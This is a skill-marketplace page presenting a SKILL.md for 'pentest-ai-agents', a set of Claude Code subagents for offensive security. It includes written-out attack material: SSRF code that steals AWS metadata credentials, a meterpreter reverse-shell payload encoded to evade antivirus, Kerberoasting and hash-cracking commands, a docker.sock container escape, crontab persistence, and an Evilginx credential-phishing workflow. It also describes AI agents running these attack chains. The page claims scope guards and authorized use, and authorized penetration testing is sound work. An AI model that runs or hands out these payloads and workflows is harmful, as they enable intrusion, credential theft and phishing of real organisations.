Pentest Ai Agents

Name: Pentest Ai Agents
Author: aradotso

aradotso/security-skills

1.2k installs
8 repo stars
Updated July 16, 2026
aradotso/security-skills

pentest-ai-agents provides documented workflows for Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security repor

About

The pentest-ai-agents skill claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting # pentest-ai-agents > Skill by [ara.so](https://ara.so) - Security Skills collection. pentest-ai-agents transforms Claude Code into an offensive security research assistant through 35 specialized subagents. Each agent carries deep domain knowledge in specific areas: recon, web testing, Active Directory, cloud security, mobile/wireless pentesting, social engineering, payload crafting, reverse engineering, exploit chaining, detection engineering, and forensics. The agents route automatically based on task description - no manual agent selection needed. They understand 80+ offensive security tools (nmap, nuclei, BloodHound, Impacket, Sliver, Ghidra, etc.) and can plan engagements, analyze recon data, research exploits, chain attacks, build detections, and write reports. ## Installation ### Quick Install (Recommended) ```bash curl -fsSL https://raw.githubusercontent.com/0xSteph/pentest-ai-agents/main/install.sh | bash ``` This copies agent files to `~/.claude/agents/` and is idempotent (safe t.

**Tier 1 (Advisory)**: Analyze data, plan engagements, recommend commands. Never execute tools directly. Examples: engag
**Tier 2 (Execution-capable)**: Can run tools with user approval and declared scope. Examples: recon-advisor, web-hunter
engagement-planner: Phased pentest plans with MITRE ATT&CK mappings
threat-modeler: STRIDE/DREAD threat modeling
opsec-anonymizer: Operator identity hygiene, source IP design

Pentest Ai Agents by the numbers

1,189 all-time installs (skills.sh)
+33 installs in the week ending Jul 28, 2026 (Skillselion tracking)
Ranked #253 of 2,066 Data Science & ML skills by installs in the Skillselion catalog
Security screen: CRITICAL risk (skills.sh audit)
Data as of Jul 28, 2026 (Skillselion catalog sync)

At a glance

pentest-ai-agents capabilities & compatibility

Capabilities: **tier 1 (advisory)**: analyze data, plan engage · **tier 2 (execution capable)**: can run tools wi · engagement planner: phased pentest plans with mi · threat modeler: stride/dread threat modeling · opsec anonymizer: operator identity hygiene, sou
Use cases: documentation · planning

From the docs

What pentest-ai-agents says it does

pentest-ai-agents transforms Claude Code into an offensive security research assistant through 35 specialized subagents.

SKILL.md

npx skills add https://github.com/aradotso/security-skills --skill pentest-ai-agents

Add your badge

Show developers this skill is listed on Skillselion. Paste this into your README.

[![Listed on Skillselion](https://skillselion.com/badge/skills/aradotso/security-skills/pentest-ai-agents.svg)](https://skillselion.com/skills/aradotso/security-skills/pentest-ai-agents)

Installs	1.2k
repo stars	★ 8
Security audit	0 / 3 scanners passed
Last updated	July 16, 2026
Repository	aradotso/security-skills ↗

How do I use pentest-ai-agents for the task described in its SKILL.md triggers?

Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting

Who is it for?

Teams invoking pentest-ai-agents when the user request matches documented triggers and prerequisites.

Skip if: Skip when cached docs are missing, the request is a negative trigger, or another sibling skill owns the workflow.

When should I use this skill?

Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting

What you get

Step-by-step guidance grounded in pentest-ai-agents documentation and reference files.

Penetration test plan
Detection rules
Penetration test report

By the numbers

Includes 35 offensive security subagents
Documented triggers cover nmap, BloodHound, STIG compliance, and pentest reporting

Files

SKILL.mdMarkdownGitHub ↗

pentest-ai-agents

Skill by ara.so — Security Skills collection.

pentest-ai-agents transforms Claude Code into an offensive security research assistant through 35 specialized subagents. Each agent carries deep domain knowledge in specific areas: recon, web testing, Active Directory, cloud security, mobile/wireless pentesting, social engineering, payload crafting, reverse engineering, exploit chaining, detection engineering, and forensics.

The agents route automatically based on task description—no manual agent selection needed. They understand 80+ offensive security tools (nmap, nuclei, BloodHound, Impacket, Sliver, Ghidra, etc.) and can plan engagements, analyze recon data, research exploits, chain attacks, build detections, and write reports.

Installation

Quick Install (Recommended)

curl -fsSL https://raw.githubusercontent.com/0xSteph/pentest-ai-agents/main/install.sh | bash

This copies agent files to ~/.claude/agents/ and is idempotent (safe to re-run for updates).

Manual Clone and Install

git clone https://github.com/0xSteph/pentest-ai-agents.git
cd pentest-ai-agents

# Install agents globally for all projects
./install.sh --global

# Or install for current project only
./install.sh --project

# Use Haiku for advisory agents (lower cost)
./install.sh --global --lite

# Also install underlying CLI tools (nmap, nuclei, ffuf, etc.)
./install.sh --tools

The --tools flag installs underlying offensive security tools via apt/brew/pacman + pipx/go/cargo.

Installation Modes

Flag	Behavior
`--global`	Install to `~/.claude/agents/` (all projects)
`--project`	Install to `.claude/agents/` (current project)
`--lite`	Use Haiku for Tier 1 advisory agents (cost optimization)
`--tools`	Install underlying tools (nmap, nuclei, BloodHound, etc.)

Agent Architecture

Tier 1 vs Tier 2

Tier 1 (Advisory): Analyze data, plan engagements, recommend commands. Never execute tools directly. Examples: engagement-planner, exploit-guide, detection-engineer.
Tier 2 (Execution-capable): Can run tools with user approval and declared scope. Examples: recon-advisor, web-hunter, ad-attacker, payload-crafter.

All Tier 2 agents enforce scope guards—they require explicit engagement scope declaration and refuse out-of-scope actions.

Agent Categories

Planning & OSINT:
  - engagement-planner: Phased pentest plans with MITRE ATT&CK mappings
  - threat-modeler: STRIDE/DREAD threat modeling
  - opsec-anonymizer: Operator identity hygiene, source IP design
  - osint-collector: Domain recon, email harvesting, social profiling
  - recon-advisor: Parses nmap/nuclei/BloodHound, prioritizes targets

Vulnerability Discovery:
  - vuln-scanner: nuclei, nikto, nmap NSE, RouterSploit orchestration
  - web-hunter: ffuf, gobuster, sqlmap, dalfox, Commix
  - api-security: API testing (GraphQL, REST, gRPC)
  - bizlogic-hunter: Business logic flaws, race conditions, IDOR
  - bug-bounty: Bug bounty workflow optimization
  - llm-redteam: OWASP LLM Top 10, prompt injection, RAG poisoning

Infrastructure Attacks:
  - ad-attacker: BloodHound, Impacket, NetExec, Certipy, Kerberos abuse
  - cloud-security: AWS/Azure/GCP misconfig, SCPs, IAM abuse
  - cicd-redteam: Pipeline exploitation, artifact poisoning
  - container-breakout: Docker/K8s escape, runc/cri-o CVEs, RBAC abuse

Specialized Domains:
  - mobile-pentester: Frida, Objection, jadx, MobSF
  - wireless-pentester: aircrack-ng, hcxtools, bettercap
  - social-engineer: Social engineering campaigns
  - phishing-operator: GoPhish, Evilginx, dnstwist

Post-Exploitation:
  - privesc-advisor: Linux/Windows privilege escalation
  - c2-operator: Sliver/Mythic/Havoc/Cobalt Strike profiles
  - payload-crafter: msfvenom, Donut, custom loaders
  - swarm-orchestrator: Multi-agent attack coordination

Analysis & Reverse Engineering:
  - reverse-engineer: Ghidra, Radare2, Binwalk, dnSpy
  - malware-analyst: Volatility 3, YARA, sandbox analysis
  - forensics-analyst: Incident response, memory/disk analysis
  - ctf-solver: CTF challenge solver (crypto, stego, pwn, web)

Exploit Development:
  - exploit-chainer: Multi-step attack composition
  - attack-planner: Attack graph generation, path optimization
  - poc-validator: Exploit proof-of-concept validation
  - credential-tester: Hydra, Hashcat, credential stuffing

Defense & Reporting:
  - detection-engineer: Sigma, Splunk SPL, Elastic KQL, Sentinel KQL
  - stig-analyst: DISA STIG compliance auditing
  - report-generator: Executive summaries, technical findings, CVSS scoring

Core Commands

Interactive Routing

Once installed, just describe your task in Claude Code:

"Plan an internal pentest for a 500-endpoint AD environment, 2-week window."
"I have a domain user, where do I look first in BloodHound?"
"Convert this SharpHound EXE into shellcode for an EDR test."
"Run a phishing simulation against acme-corp.com."
"Reverse this firmware image and analyze the crypto protocol."

Claude routes to the appropriate specialist automatically.

Slash Commands

# Get agent recommendation + concrete next commands
/recommend "phish a small SaaS team's IT department"

# Filter agents by domain
/agents-for web
/agents-for cloud
/agents-for active-directory

# List all agents
/agents

Tool Audit

Check which underlying tools are installed:

# Audit all tools grouped by agent
bash db/doctor.sh

# Audit specific agent's toolchain
bash db/doctor.sh --agent ad-attacker

# Machine-readable output
bash db/doctor.sh --json

Output shows ✔ (installed) or ✘ (missing) per tool with install hints.

Findings Database

Track engagement findings in persistent SQLite:

# Initialize new engagement
bash findings.sh init acme-corp-2026

# Add a finding (auto-routed from agent output)
bash findings.sh add --severity critical --title "Domain Admin in Kerberoastable SPN" \
  --description "SVC_SQL account has adminCount=1 and servicePrincipalName set" \
  --cve CVE-2022-12345 --cvss 8.8 --host dc01.acme.local --tool bloodhound

# Show engagement stats
bash findings.sh stats

# Export findings as JSON
bash findings.sh export

# Export as Markdown report
bash findings.sh export --format md

Schema includes cve, tool_used, mitre_attack, remediation columns.

Session Handoffs

Generate handoff reports between work sessions:

bash handoff.sh

Produces Markdown with: what was accomplished, current state, immediate next actions, blockers.

Configuration

Environment Variables

# Anthropic API key (required)
export ANTHROPIC_API_KEY="sk-ant-..."

# Optional: Model overrides
export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022"  # Advisory agents
export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219" # Execution agents

# Optional: Findings database path
export PENTEST_FINDINGS_DB="$HOME/.pentest/findings.db"

# Optional: Tool installation preferences
export PENTEST_PACKAGE_MANAGER="apt"  # apt, brew, pacman, yum

Scope Declaration (Tier 2 Agents)

Tier 2 agents require explicit scope before executing tools:

# In Claude Code, declare scope first:
"Engagement scope: 10.10.10.0/24, acme-corp.com, authorized by Jane Doe <jane@acme.com>, 2026-05-01 to 2026-05-15"

# Then request actions:
"Run full port scan on 10.10.10.0/24"
"Enumerate SMB shares on discovered hosts"

Agents refuse actions outside declared IP ranges, domains, and time windows.

Hard Refusal List

All agents enforce scope guards that refuse:

Denial of Service (DoS/DDoS)
Mass internet scanning
Unattended worm/ransomware propagation
False-flag operations
Safety-of-life system targeting (medical, industrial control)

Usage Patterns

Engagement Planning

# In Claude Code:
"Plan a 2-week external pentest for fintech-startup.io. Assume no prior credentials. Focus on web app, API, and cloud infrastructure."

engagement-planner produces:

Phased timeline (recon → initial access → privilege escalation → lateral movement → exfil simulation)
MITRE ATT&CK technique mappings per phase
Tool recommendations with time estimates
ROE template with emergency contacts

Recon and Target Prioritization

# Run recon tools (outside Claude):
nmap -sV -sC -oA acme-scan 10.10.10.0/24
nuclei -l hosts.txt -severity critical,high -json -o nuclei.json

# In Claude Code:
"Analyze acme-scan.xml and nuclei.json. Prioritize targets for initial access."

recon-advisor (Tier 2): 1. Parses XML/JSON 2. Groups findings by host and severity 3. Recommends attack paths (e.g., "10.10.10.50: outdated Apache + ProxyShell CVE") 4. Suggests next commands: ffuf -u http://10.10.10.50/FUZZ -w /usr/share/wordlists/dirb/common.txt

Active Directory Attack Chains

# After obtaining BloodHound JSON:
"I have domain user alice@acme.local. BloodHound data is in ./bloodhound/. Show me paths to Domain Admins and recommend attacks."

ad-attacker:

Runs bloodhound-python or parses existing JSON
Identifies: Kerberoastable accounts, AS-REP roastable users, constrained delegation, ACL abuse paths
Generates command sequences:

  GetUserSPNs.py acme.local/alice:password -dc-ip 10.10.10.5 -request -outputfile spns.txt
  hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt

Exploit Chaining

"I found SSRF in the /admin/debug endpoint and read /etc/passwd. Next steps to get a shell?"

exploit-chainer: 1. Validates SSRF → file read primitive 2. Recommends: SSRF → internal service enumeration → cloud metadata (if AWS/Azure/GCP) 3. Chains: SSRF to 169.254.169.254 → IAM role credentials → S3 bucket access → RCE via Lambda 4. Provides POC code:

   import requests
   url = "https://target.com/admin/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
   roles = requests.get(url).text.split('\n')
   creds = requests.get(f"{url}{roles[0]}").json()
   print(creds['AccessKeyId'], creds['SecretAccessKey'], creds['Token'])

Payload Crafting and Evasion

"Generate a Windows reverse shell payload for 10.10.10.50:443, encode it to evade AV, and convert to shellcode for process injection."

payload-crafter:

# Stage 1: Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.50 LPORT=443 -f exe -o payload.exe

# Stage 2: Convert to shellcode with Donut
donut -a 2 -f 1 payload.exe -o payload.bin

# Stage 3: Encode shellcode (XOR + base64)
python3 << 'EOF'
with open('payload.bin', 'rb') as f:
    sc = f.read()
xor_sc = bytes([b ^ 0xAA for b in sc])
import base64
print(base64.b64encode(xor_sc).decode())
EOF

# Stage 4: Inject via process hollowing (C# template provided)

Includes AMSI bypass snippets and ETW patching patterns.

Detection Engineering

"We just tested Kerberoasting against SVC_SQL. Build Sigma and Splunk detection rules."

detection-engineer:

# Sigma rule (kerberoasting.yml)
title: Kerberoasting TGS Request
status: experimental
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketOptions: '0x40810000'
    ServiceName|endswith: '$'
  filter:
    ServiceName|startswith: 'krbtgt'
  condition: selection and not filter
falsepositives:
  - Legitimate service account access
level: medium
tags:
  - attack.credential_access
  - attack.t1558.003

# Splunk SPL
index=windows EventCode=4769 Ticket_Options=0x40810000 Service_Name=*$ NOT Service_Name=krbtgt*
| stats count by src_ip, Account_Name, Service_Name
| where count > 5

Reverse Engineering Firmware

"Analyze router-firmware.bin and extract the encryption keys."

reverse-engineer:

# Extract filesystem
binwalk -e router-firmware.bin

# Identify architecture
file _router-firmware.bin.extracted/squashfs-root/bin/httpd
# Output: ELF 32-bit LSB MIPS

# Load into Ghidra (headless mode)
analyzeHeadless /tmp/ghidra_project router_fw -import _router-firmware.bin.extracted/squashfs-root/bin/httpd -postScript FindCryptoKeys.java

# Search for hardcoded keys
strings -n 16 httpd | grep -E '^[A-Fa-f0-9]{32,}$'

Provides Ghidra Python scripts for automated key extraction from common crypto libraries (OpenSSL, mbedTLS).

Phishing Campaign Setup

"Set up a phishing campaign for acme-corp.com employees. Clone their SSO login page and capture credentials with session cookies."

phishing-operator:

# 1. Register lookalike domain
# Manual: acme-sso.com (or use dnstwist suggestions)
dnstwist acme-corp.com --registered | head -10

# 2. Clone SSO page
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent https://sso.acme-corp.com/login

# 3. Deploy Evilginx
evilginx2 -p ./phishlets
# Configure phishlet for acme-corp SSO (example phishlet config provided)

# 4. Track campaign in GoPhish
# Import targets, attach cloned template, set sending profile

Includes SMTP relay setup, domain reputation warming, and email header crafting to evade SPF/DKIM/DMARC.

CTF Challenges

"Solve this CTF crypto challenge: ciphertext is 'Xq3mK9...' and we have a PCAP with TLS handshake."

ctf-solver: 1. Identifies cipher type (frequency analysis suggests substitution) 2. Tries automated solvers: dcode.fr substitution, quipqiup 3. Extracts TLS pre-master secret from PCAP via Wireshark 4. Decrypts TLS stream:

   tshark -r capture.pcap -o tls.keylog_file:sslkeylog.txt -Y http -T fields -e http.file_data

Covers crypto, steganography (zsteg, steghide), forensics, binary exploitation, web challenges.

Underlying Tools

Agents drive these tools (installable via install.sh --tools):

Recon: nmap, masscan, rustscan, subfinder, amass, httpx, theHarvester, sherlock, holehe, maigret Web: ffuf, gobuster, feroxbuster, sqlmap, dalfox, Commix, dirsearch, whatweb Vulnerability: nuclei, nikto, nmap NSE, RouterSploit AD: BloodHound, Impacket, NetExec, Certipy, kerbrute, Responder Credentials: Hydra, Hashcat, John, cupp, CeWL, Crunch, hashid, haiti Cloud: aws-cli, azure-cli, gcloud, Trivy, Prowler, ScoutSuite, Pacu Containers: kubectl, kube-hunter, peirates, CDK C2: Sliver, Mythic, Havoc, Cobalt Strike LLM: Garak, PyRIT, Promptfoo Mobile: Frida, Objection, jadx, apktool, MobSF Wireless: aircrack-ng, hcxdumptool, bettercap Social: GoPhish, Evilginx, dnstwist Payloads: msfvenom, Donut RE: Ghidra, Radare2, Binwalk, dnSpy Forensics: Volatility 3, exiftool, YARA, Wireshark

Run bash db/doctor.sh to audit installed tools.

Token Optimization

Model Selection

# Use Haiku for advisory agents (engagement-planner, exploit-guide, detection-engineer)
./install.sh --global --lite

# Or set manually:
export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022"
export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219"

Cost comparison (per 1M tokens input):

Haiku: $0.80
Sonnet: $3.00

Tier 1 agents handle ~80% of interactions (planning, analysis, recommendations). Using Haiku for Tier 1 cuts costs by ~60% with minimal quality impact.

Context Management

Agents use structured tool output parsing to minimize repeated context:

# Instead of pasting full nmap XML into chat:
findings.sh import --file acme-scan.xml

# Agent queries SQLite directly:
SELECT host, port, service, version FROM scan_results WHERE severity='critical';

Reduces token usage by 10-50× for large scan outputs.

Local Models (Experimental)

Run agents with local models via Ollama:

# Install Ollama
curl -fsSL https://ollama.com/install.sh | sh

# Pull model
ollama pull mixtral:8x7b

# Configure pentest-ai-agents
export PENTEST_LOCAL_MODEL="mixtral:8x7b"
export ANTHROPIC_API_KEY=""  # Disable cloud models

Tested models:

mixtral:8x7b: Good for Tier 1 advisory agents
llama3:70b: Comparable to Haiku for planning/analysis
codellama:34b: Decent for exploit POC generation

Limitations: Local models struggle with complex exploit chaining and detection rule generation. Recommend hybrid mode: local for Tier 1, Claude Sonnet for Tier 2.

Troubleshooting

Agent Not Routing

Symptom: Claude doesn't invoke the right agent for your task.

Fix: Be more explicit in task description:

# Vague
"Help with Active Directory"

# Specific
"I have a domain user. Analyze BloodHound data and recommend Kerberoasting attacks."

Or use slash commands:

/recommend "domain user to domain admin in AD environment"

Tools Not Found

Symptom: Agent recommends command, but tool isn't installed.

Fix:

# Audit missing tools
bash db/doctor.sh

# Install missing tools
./install.sh --tools

# Or install specific tool manually:
sudo apt install nmap
pipx install bloodhound

Scope Refusal

Symptom: Tier 2 agent refuses to run commands: "No engagement scope declared."

Fix: Declare scope first:

"Engagement scope: 10.10.10.0/24, testlab.local, authorized by Alice <alice@example.com>, 2026-05-01 to 2026-05-31"

Include: IP ranges, domains, authorizing party, time window.

Findings Database Locked

Symptom: database is locked error when adding findings.

Fix:

# Close any open findings.sh processes
pkill -f findings.sh

# Or use WAL mode (write-ahead logging):
sqlite3 ~/.pentest/findings.db "PRAGMA journal_mode=WAL;"

Out-of-Date Agent Knowledge

Symptom: Agent recommends deprecated tool or technique.

Fix: Update agents:

cd pentest-ai-agents
git pull
./install.sh --global

Agents track tool updates via community feedback. File issues for outdated recommendations.

Real-World Examples

Example 1: Full External Pentest Workflow

# Step 1: Plan engagement
# In Claude Code:
"Plan a 2-week external pentest for acme-corp.com. No credentials. Focus on web, API, cloud."

# engagement-planner produces timeline, ROE, tool list

# Step 2: OSINT recon
"Run OSINT on acme-corp.com. Find subdomains, employee emails, leaked credentials."

# osint-collector executes:
subfinder -d acme-corp.com -o subs.txt
amass enum -d acme-corp.com -o amass.txt
theHarvester -d acme-corp.com -b all -f harvest.json
# Searches breach databases (dehashed, etc.)

# Step 3: Vulnerability scanning
"Scan discovered hosts with nuclei for critical/high severity issues."

# vuln-scanner:
nuclei -l live-hosts.txt -severity critical,high -json -o nuclei.json

# Step 4: Prioritize targets
"Analyze nuclei.json. Which hosts are most likely to give initial access?"

# recon-advisor:
# 1. Parses JSON
# 2. Identifies: SSRF in admin panel, outdated WordPress, exposed Git repo
# 3. Recommends: "Target admin.acme-corp.com/debug (SSRF) for cloud metadata access"

# Step 5: Exploit SSRF
"Exploit SSRF at admin.acme-corp.com/debug to access AWS metadata and pivot to S3."

# exploit-chainer:
curl "https://admin.acme-corp.com/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# Extracts AWS keys
aws s3 ls --profile stolen-creds
# Finds sensitive data bucket

# Step 6: Build detection
"Build Sigma and Splunk rules to detect SSRF to cloud metadata endpoints."

# detection-engineer:
# Produces Sigma rule + Splunk SPL + AWS CloudTrail query

# Step 7: Report
"Generate executive summary and technical findings report."

# report-generator:
# Outputs Markdown with CVSS scores, remediation steps, attack timeline

Example 2: AD Privilege Escalation from User to Domain Admin

# Starting point: domain user alice@corp.local

# Step 1: Enumerate AD
"I have alice@corp.local credentials. Enumerate AD and find paths to Domain Admins."

# ad-attacker:
bloodhound-python -u alice -p 'Password123' -d corp.local -dc dc01.corp.local -c All --zip
# Uploads to BloodHound GUI or parses JSON locally

# Step 2: Identify attack path
"Analyze BloodHound data. What's the shortest path to DA?"

# ad-attacker:
# Finds: alice → MemberOf → IT-Admins → GenericWrite → SVC_SQL → Kerberoastable → DA group

# Step 3: Execute attack chain
"Execute the attack chain: GenericWrite to add SPN, Kerberoast SVC_SQL, crack hash."

# ad-attacker:
# 1. Add SPN to SVC_SQL (GenericWrite abuse)
python3 addspn.py -u alice -p 'Password123' -t SVC_SQL -s HTTP/fake.corp.local corp.local/dc01

# 2. Kerberoast
GetUserSPNs.py corp.local/alice:Password123 -dc-ip dc01.corp.local -request -outputfile tgs.txt

# 3. Crack
hashcat -m 13100 tgs.txt rockyou.txt

# 4. Validate DA access
netexec smb dc01.corp.local -u SVC_SQL -p 'CrackedPassword' --shares

# Step 4: Build detection
"Build detection rules for GenericWrite SPN modification and Kerberoasting."

# detection-engineer:
# Sigma rule for Event ID 4742 (user object modified) + SPN change
# Splunk correlation for 4742 → 4769 (TGS request) within 5 minutes

Example 3: Container Escape to Host Root

# Starting point: Shell inside Docker container

# Step 1: Assess container environment
"I have a shell in a Docker container. Assess escape vectors."

# container-breakout:
# Checks: privileged flag, host PID namespace, mounted /var/run/docker.sock, capabilities

# Step 2: Exploit mounted docker.sock
"docker.sock is mounted. Exploit it to escape to host."

# container-breakout:
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
# Now root on host

# Step 3: Persistence
"Establish persistence on the host as root."

# c2-operator:
# Recommends: cron job, systemd service, SSH key injection
echo "* * * * * root /tmp/.update.sh" >> /host/etc/crontab

# Step 4: Detection
"Build Falco rule to detect docker.sock abuse from containers."

# detection-engineer:
# Falco rule for container process accessing /var/run/docker.sock

Legal and Ethical Use

Authorized testing only. All agents enforce scope guards:

Require explicit engagement scope (IP ranges, domains, authorization, dates)
Refuse out-of-scope actions
Log all commands for audit trails

Hard refusals for:

Denial of Service
Mass internet scanning
Unattended worm propagation
False-flag operations
Safety-of-life systems (medical, ICS/SCADA)

Users are responsible for obtaining proper authorization before testing. pentest-ai-agents is a research and education tool. Unauthorized testing is illegal.

Contributing

Contributions welcome:

New agents (follow existing structure in agents/)
Tool integrations (add to db/tools.json)
Detection rules (expand detection-engineer ruleset)
Bug fixes and documentation improvements

See CONTRIBUTING.md for guidelines.

Resources

Documentation
INSTALL.md - Detailed installation guide
Agent Reference - Full agent descriptions
Tool Matrix - Tool coverage by agent
GitHub Issues - Report bugs, request features

License

MIT License - see LICENSE

Related skills

Microsoft FoundryDeploy, evaluate, and continuously improve Microsoft Foundry agents from a single agent interface.478k1.3k

Ai Research ReproductionOrchestrate trustworthy, auditable reproduction of deep learning repositories directly from their READMEs.164k507

Run TrainSafely execute selected deep learning training commands with standardized evidence capture.164k507

Explore RunSafely run isolated exploratory experiments with clear recording and conservative selection before committing changes.164k507

Paper Context ResolverFetch precise reproduction-critical details like dataset splits, preprocessing steps, or evaluation protocols from the original academic paper when the repo README leav141k507

Repo Intake And PlanScan unfamiliar AI research repositories and receive a minimal, trustworthy reproduction target before investing significant time.140k507

How it compares

Pick this when Claude Code needs coordinated offensive-security subagents across recon, exploitation research, detections, and reporting rather than one generic security prompt.

FAQ

What does pentest-ai-agents do?

Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting

When should I use pentest-ai-agents?

Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting

What are common prerequisites?

--- name: pentest-ai-agents description: Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting triggers: - pl

Is Pentest Ai Agents safe to install?

skills.sh reports 0 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.

Data Science & MLresearch

About

Pentest Ai Agents by the numbers

pentest-ai-agents capabilities & compatibility

What pentest-ai-agents says it does

Add your badge

How do I use pentest-ai-agents for the task described in its SKILL.md triggers?

Who is it for?

When should I use this skill?

What you get

By the numbers

Files

pentest-ai-agents

Installation

Quick Install (Recommended)

Manual Clone and Install

Installation Modes

Agent Architecture

Tier 1 vs Tier 2

Agent Categories

Core Commands

Interactive Routing

Slash Commands

Tool Audit

Findings Database

Session Handoffs

Configuration

Environment Variables

Scope Declaration (Tier 2 Agents)

Hard Refusal List

Usage Patterns

Engagement Planning

Recon and Target Prioritization

Active Directory Attack Chains

Exploit Chaining

Payload Crafting and Evasion

Detection Engineering

Reverse Engineering Firmware

Phishing Campaign Setup

CTF Challenges

Underlying Tools

Token Optimization

Model Selection

Context Management

Local Models (Experimental)

Troubleshooting

Agent Not Routing

Tools Not Found

Scope Refusal

Findings Database Locked

Out-of-Date Agent Knowledge

Real-World Examples

Example 1: Full External Pentest Workflow

Example 2: AD Privilege Escalation from User to Domain Admin

Example 3: Container Escape to Host Root

Legal and Ethical Use

Contributing

Resources

License

Related skills

How it compares

FAQ

What does pentest-ai-agents do?

When should I use pentest-ai-agents?

What are common prerequisites?

Is Pentest Ai Agents safe to install?

This week in AI coding